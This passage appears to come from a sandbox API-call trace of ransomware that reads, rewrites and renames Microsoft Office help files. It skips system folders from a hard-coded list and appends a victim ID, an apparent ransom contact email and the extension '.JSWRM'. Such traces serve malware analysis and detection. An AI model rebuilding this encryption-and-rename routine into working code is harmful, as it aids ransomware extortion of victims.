lpOverlapped=0x0) returned 1 [0121.253] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.253] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1efd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1efd0, lpOverlapped=0x0) returned 1 [0121.253] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.254] CloseHandle (hObject=0x238) returned 1 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0121.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0121.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0121.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0121.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0121.254] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0121.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0121.254] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0121.254] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0121.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0121.255] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0121.255] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xef93c032, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xef93c032, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ea22, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_BASIC.HXS", cAlternateFileName="SKYPEF~1.HXS")) returned 1 [0121.255] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2=".") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="..") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="...") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="windows") returned -1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="recovery") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="perflogs") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="documents and settings") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="$RECYCLE.BIN") returned 1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="system volume information") returned -1 [0121.256] lstrcmpiW (lpString1="SKYPEFB_BASIC.HXS", lpString2="msocache") returned 1 [0121.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC.HXS", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0121.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC.HXS", cchWideChar=17, lpMultiByteStr=0x240f48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC.HXS", lpUsedDefaultChar=0x0) returned 17 [0121.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC.HXS", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0121.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0121.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC.HXS", cchWideChar=17, lpMultiByteStr=0x240fc0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC.HXS", lpUsedDefaultChar=0x0) returned 17 [0121.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0121.256] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0121.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.256] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.256] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0121.256] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic.hxs"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.257] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=125474) returned 1 [0121.257] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.257] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ea20) returned 0x24e1d8 [0121.258] ReadFile (in: hFile=0x238, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x1ea20, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e89c*=0x1ea20, lpOverlapped=0x0) returned 1 [0121.267] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.267] WriteFile (in: hFile=0x238, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x1ea20, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e898*=0x1ea20, lpOverlapped=0x0) returned 1 [0121.268] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0121.268] CloseHandle (hObject=0x238) returned 1 [0121.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0121.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0121.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0121.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.269] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0121.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.269] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.269] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC.HXS" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic.hxs"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC.HXS.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic.hxs.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0121.270] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x295, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_BASIC_COL.HXC", cAlternateFileName="SKYPEF~2.HXC")) returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2=".") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="..") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="...") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="windows") returned -1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="recovery") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="perflogs") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="documents and settings") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="$RECYCLE.BIN") returned 1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="system volume information") returned -1 [0121.270] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXC", lpString2="msocache") returned 1 [0121.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXC", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0121.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXC", cchWideChar=21, lpMultiByteStr=0x241358, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_COL.HXC", lpUsedDefaultChar=0x0) returned 21 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0121.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXC", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0121.270] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXC", cchWideChar=21, lpMultiByteStr=0x2411c8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_COL.HXC", lpUsedDefaultChar=0x0) returned 21 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0121.270] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0121.270] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0121.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.271] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0121.271] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.271] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=661) returned 1 [0121.271] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.271] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x290) returned 0x20b1f8 [0121.271] ReadFile (in: hFile=0x238, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x290, lpOverlapped=0x0) returned 1 [0121.273] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.273] WriteFile (in: hFile=0x238, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x290, lpOverlapped=0x0) returned 1 [0121.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0121.273] CloseHandle (hObject=0x238) returned 1 [0121.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0121.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0121.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0121.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0121.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0121.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0121.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0121.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0121.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0121.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0121.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0121.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0121.273] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0121.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0121.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0121.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0121.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0121.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0121.274] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xae963cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xae963cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xae963cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xd5, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="SKYPEFB_BASIC_COL.HXT", cAlternateFileName="SKYPEF~2.HXT")) returned 1 [0121.274] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2=".") returned 1 [0121.274] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="..") returned 1 [0121.274] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="...") returned 1 [0121.274] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="windows") returned -1 [0121.274] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="recovery") returned 1 [0121.275] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="perflogs") returned 1 [0121.275] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="documents and settings") returned 1 [0121.275] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="$RECYCLE.BIN") returned 1 [0121.275] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="system volume information") returned -1 [0121.275] lstrcmpiW (lpString1="SKYPEFB_BASIC_COL.HXT", lpString2="msocache") returned 1 [0121.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXT", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0121.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXT", cchWideChar=21, lpMultiByteStr=0x2410d8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_COL.HXT", lpUsedDefaultChar=0x0) returned 21 [0121.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0121.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXT", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0121.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0121.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SKYPEFB_BASIC_COL.HXT", cchWideChar=21, lpMultiByteStr=0x241308, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SKYPEFB_BASIC_COL.HXT", lpUsedDefaultChar=0x0) returned 21 [0121.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0121.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0121.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0121.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0121.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0121.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0121.275] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\SKYPEFB_BASIC_COL.HXT" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\skypefb_basic_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0121.276] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=213) returned 1 [0121.276] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0121.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22e358 [0121.276] ReadFile (in: hFile=0x238, lpBuffer=0x22e358, nNumberOfBytesToRead=0xd0, lpNumberOfBytesRead=0x345e89c, 